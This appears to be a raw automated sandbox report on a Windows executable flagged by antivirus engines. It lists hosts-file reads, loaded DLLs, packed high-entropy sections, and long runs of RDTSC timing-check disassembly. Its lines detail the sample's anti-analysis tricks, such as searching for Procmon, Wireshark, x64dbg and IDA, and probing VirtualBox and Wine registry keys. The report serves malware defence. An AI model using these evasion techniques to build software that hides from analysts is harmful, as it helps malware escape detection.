Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: jklg6EIhyR.exeVirustotal: Detection: 51%
Source: jklg6EIhyR.exeReversingLabs: Detection: 71%
Source: jklg6EIhyR.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: jklg6EIhyR.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeSection loaded: kernel.appcore.dllJump to behavior
Source: jklg6EIhyR.exeStatic file information: File size 4495872 > 1048576
Source: jklg6EIhyR.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: jklg6EIhyR.exeStatic PE information: Raw size of pfhmiofh is bigger than: 0x100000 < 0x1c2a00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\jklg6EIhyR.exeUnpacked PE file: 0.2.jklg6EIhyR.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pfhmiofh:EW;kvkhumva:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pfhmiofh:EW;kvkhumva:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: jklg6EIhyR.exeStatic PE information: real checksum: 0x453b38 should be: 0x44bd80
Source: jklg6EIhyR.exeStatic PE information: section name:
Source: jklg6EIhyR.exeStatic PE information: section name: .idata
Source: jklg6EIhyR.exeStatic PE information: section name:
Source: jklg6EIhyR.exeStatic PE information: section name: pfhmiofh
Source: jklg6EIhyR.exeStatic PE information: section name: kvkhumva
Source: jklg6EIhyR.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0185D080 push eax; ret 0_3_0185D081
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_3_0187C109 push edx; ret 0_3_0187C83A
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_00AF41D0 push eax; mov dword ptr [esp], edx0_2_00AF41D5
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007F2340 push eax; mov dword ptr [esp], 00000000h0_2_007F2343
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_0082C7F0 push eax; mov dword ptr [esp], 00000000h0_2_0082C743
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007B0AC0 push eax; mov dword ptr [esp], 00000000h0_2_007B0AC4
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007D1430 push eax; mov dword ptr [esp], 00000000h0_2_007D1433
Source: C:\Users\user\Desktop\jklg6EIhyR.exeCode function: 0_2_007F39A0 push eax; mov dword ptr [esp], 00000000h0_2_007F39A3
Source: jklg6EIhyR.exeStatic PE information: section name: pfhmiofh entropy: 7.9553931910835605

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\jklg6EIhyR.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: jklg6EIhyR.exe, 00000000.00000003.1274897175.00000000074D0000.00000004.00001000.00020000.00000000.sdmp, jklg6EIhyR.exe, 00000000.00000002.1430444255.0000000000D31000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: EA01C7 second address: EA01CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: EA01CB second address: EA01D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101958C second address: 1019591 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1019591 second address: 1019599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD04 second address: 101DD0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD0A second address: 101DD0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD0E second address: 101DD14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD14 second address: 101DD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F78B909B0F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD22 second address: 101DD26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101DD26 second address: 101DD2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E04A second address: 101E050 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E49F second address: 101E4AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F78B909B0F6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E4AD second address: 101E4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 101E4B1 second address: 101E4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B0FBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D31 second address: 1021D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D35 second address: 1021D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F78B909B101h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 jc 00007F78B909B0F6h 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D58 second address: 1021D62 instructions: 0x00000000 rdtsc 0x00000002 js 00007F78B9095CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021D62 second address: 1021E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F78B909B0F8h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 sub si, 3E9Fh 0x00000026 push 00000000h 0x00000028 add dword ptr [ebp+12A01886h], eax 0x0000002e push E6C3743Ch 0x00000033 push edi 0x00000034 jnp 00007F78B909B0F8h 0x0000003a pushad 0x0000003b popad 0x0000003c pop edi 0x0000003d add dword ptr [esp], 193C8C44h 0x00000044 mov dword ptr [ebp+12A0183Eh], edi 0x0000004a and edi, dword ptr [ebp+12A01B9Bh] 0x00000050 push 00000003h 0x00000052 mov dword ptr [ebp+12A033FAh], edi 0x00000058 push 00000000h 0x0000005a push edx 0x0000005b pop esi 0x0000005c push 00000003h 0x0000005e mov dx, 359Dh 0x00000062 call 00007F78B909B0F9h 0x00000067 jp 00007F78B909B0FEh 0x0000006d push eax 0x0000006e jmp 00007F78B909B0FBh 0x00000073 mov eax, dword ptr [esp+04h] 0x00000077 pushad 0x00000078 jne 00007F78B909B0FCh 0x0000007e push eax 0x0000007f push edx 0x00000080 jc 00007F78B909B0F6h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021F8E second address: 1021F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021F94 second address: 1021FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1021FA2 second address: 1021FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 103378C second address: 1033790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1033790 second address: 1033796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1010F99 second address: 1010F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1010F9F second address: 1010FF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d pushad 0x0000000e push esi 0x0000000f jl 00007F78B9095CE6h 0x00000015 pop esi 0x00000016 jmp 00007F78B9095CF6h 0x0000001b jl 00007F78B9095CECh 0x00000021 jnl 00007F78B9095CE6h 0x00000027 pushad 0x00000028 jo 00007F78B9095CE6h 0x0000002e push ebx 0x0000002f pop ebx 0x00000030 jmp 00007F78B9095CF2h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1040FF0 second address: 1041016 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B107h 0x00000007 jmp 00007F78B909B0FBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041176 second address: 1041192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B9095CF4h 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041192 second address: 1041198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041198 second address: 104119D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104119D second address: 10411AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F78B909B0F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10411AA second address: 10411C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F78B9095CE6h 0x00000010 jbe 00007F78B9095CE6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10411C0 second address: 10411E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 jns 00007F78B909B0F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104175E second address: 1041779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F78B9095CF5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418D8 second address: 10418DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418DC second address: 10418EA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418EA second address: 10418FE instructions: 0x00000000 rdtsc 0x00000002 jl 00007F78B909B0F6h 0x00000008 jns 00007F78B909B0F6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10418FE second address: 1041904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041904 second address: 1041908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041A74 second address: 1041A7E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F78B9095CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041D9D second address: 1041DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push ebx 0x00000007 jnc 00007F78B909B0FEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F78B909B0FDh 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1041DC3 second address: 1041DE0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042259 second address: 1042276 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B102h 0x00000007 pushad 0x00000008 jns 00007F78B909B0F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351D9 second address: 10351DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351DE second address: 10351FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 je 00007F78B909B102h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351FD second address: 1035203 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042969 second address: 104296D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 104296D second address: 104297A instructions: 0x00000000 rdtsc 0x00000002 jne 00007F78B9095CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042AB9 second address: 1042ABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042ABF second address: 1042AD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F78B9095CEFh 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042AD7 second address: 1042ADB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042ADB second address: 1042AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042AE5 second address: 1042AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042DDE second address: 1042E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F78B9095CE6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007F78B9095CF3h 0x00000011 popad 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042E04 second address: 1042E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B108h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1042E24 second address: 1042E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 10351B5 second address: 10351D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F78B909B102h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jg 00007F78B909B0F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1043125 second address: 1043136 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F78B9095CECh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BCF second address: 1048BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F78B909B0FFh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BE5 second address: 1048BE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BE9 second address: 1048BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007F78B909B0F6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048BFC second address: 1048C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 1048C01 second address: 1048C06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
